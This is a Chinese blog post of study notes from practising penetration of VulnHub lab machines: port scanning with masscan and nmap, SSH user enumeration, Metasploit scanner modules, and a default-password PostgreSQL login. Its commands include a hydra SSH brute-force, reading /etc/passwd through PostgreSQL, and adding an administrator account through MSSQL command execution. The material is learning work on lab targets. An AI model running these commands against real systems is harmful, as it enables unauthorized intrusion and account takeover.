昨天晚上实战了一把,遇到了很多师傅,也积累了一些刷靶机的经验,虽然Windows那台靶机不知道是怎么回事,但是Linux那台还是玩的比较爽的。
今天又重新从 https://vulnhub.com 上把靶机搞下来装到Vmware上自己实验
靶机渗透之前也玩过,但是我每次发现自己都无法找到靶机的ip地址,这次重新实验了一下可以使用arp-scan
和masscan
工具
1 | # root @ kali in ~ [3:04:28] C:1 |
前两个是类似网关的,第四个是kali的ip,中间第三个就是靶机的ip地址
用masscan
也可以发现,同时端口也可以扫出来
1 | # root @ kali in ~ [3:04:28] C:1 |
nmap扫描最常用命令nmap -sV -A -p- ip
可以扫描到靶机开放的端口和服务,当然那台靶机开放了好多好多个端口,需要记住一些常用的端口和它们对应的服务
1 | Nmap scan report for 192.168.110.164 |
同时还有一个扫描结果:以前似乎没有看到过
1 | Host script results: |
我最先打的是2049端口,因为这个端口对应的是nfs服务,用这条命令:nmap -sV --script=nfs-showmount ip
扫出可以远程挂载的目录
之后尝试挂载,但是我无法用get命令将文件拷贝下来emmmm,主机也没有对应的挂载目录。
队友打了21号端口,但是信息也不是很多
22号端口是ssh服务,A组的师傅爆出了密码,参考安全客上的方法,可以先枚举用户名,
发现靶机名字为typhoon就想着去测试一下看看账号存不存在,利用ssh用户枚举漏洞进行测试
在GitHub上找了一个ssh_enum的脚本,尝试一下还行但是没有好字典
hydra可以爆破弱口令: hydra -l typhoon -P /usr/share/wordlist/metasploit/unix_passwords.txt ssh://192.168.56.150
第一次渗透感觉还不是很熟练,能够做到的就是这些:cry:
21号端口
search ftp_version
收集ftp服务器的信息
1 | msf5 auxiliary(scanner/ftp/ftp_version) > exploit |
如果这个版本的ftp有漏洞的话是不是可以getshell?
浏览器直接访问并没有什么东西
尝试使用exploit/unix/ftp/vsftpd_234_backdoor
进行渗透但是没成功
22端口
尝试枚举用户名为typhoon
成功枚举
使用hydra去爆破密码hydra -l typhoon -P /usr/share/wordlist/metasploit/unix_passwords.txt ssh://192.168.41.166
25端口smtp服务
获取到服务器的信息1
2
3
4
5msf5 auxiliary(scanner/smtp/smtp_version) > exploit
[+] 192.168.41.166:25 - 192.168.41.166:25 SMTP 220 typhoon ESMTP Postfix (Ubuntu)\x0d\x0a
[*] 192.168.41.166:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
5432端口postgresql服务
补充一点postgresql操作:
列出数据库\l
:
1 | postgres=# \l |
列出table’\d’:
1 | ostgres=# \d |
之后使用metasploit的模块去收集信息
1 | msf5 auxiliary(scanner/postgres/postgres_version) > exploit |
直接发现弱口令1
2
3
4[-] 192.168.41.166:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.41.166:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.41.166:5432 - Login Successful: postgres:postgres@template1
[-] 192.168.41.166:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
然后登陆1
2
3
4
5
6
7# root @ kali in ~ [3:34:50] C:127
$ psql -h 192.168.41.166 -U postgres
Password for user postgres:
psql (11.2 (Debian 11.2-2), server 9.3.4)
Type "help" for help.
postgres=# help
select pg_ls_dir('./');
列出目录
1 | postgres=# select pg_ls_dir('./'); |
建表并且从/etc/passwd
中拷贝数据过来再读取,(这个姿势第一次见)
1 | postgres=# DROP TABLE if EXISTS MrLee; |
DC1靶机
姿势: find命令提权,hydra爆破,Drupal重置管理员密码
需要积累一些靶机渗透的经验
msf有好多的扫描工具在auxiliary模块里面,常用的ftp,ssh,smb,https
同时需要熟悉find和grep命令
熟悉一下各种cms的常见姿势
metasploit渗透mssql服务
1433端口对应于mssql服务,第一步一般是弱口令:use auxiliary/scanner/mssql/mssql_login
然后设置字典路径和远程主机即可
还可以使用auxiliary/scanner/mssql/mssql_ping
进一步收集信息
之后尝试登陆mssql服务use auxiliary/admin/mssql/mssql_exec
可以设置cmdset CMD cmd.exe /c net user
添加管理员用户,远程登陆:cmd.exe /c net user shenlan test /add&net localgroup administrator shenlan /add
开启3389端口一般是提供远程桌面服务,
masscan扫描工具
扫描指定网络和端口:masscan.exe -p80 192.168.81.1/24
扫描指定主机所有开放的端口:
masscan.exe -p0-65535 192.168.81.143
--banners
可以获取服务器的banner信息 --echo
选项将配置信息保存下来,这样可以下一次快速扫描
masscan.exe -p80,443,3306 192.168.81.143 —banners —echo>1.conf 保存配置信息
masscan.exe -c 1.conf 读取配置信息
--rate
提高扫描速度
渗透技巧:Windows平台运行Masscan和Nmap
nmap高级使用技巧
nmap常见的扫描方式:
半开放扫描: -sS 没有建立三次握手连接,速度很快
全连接扫描:-sT 三次握手过程,速度较慢
扫描UDP端口: -sU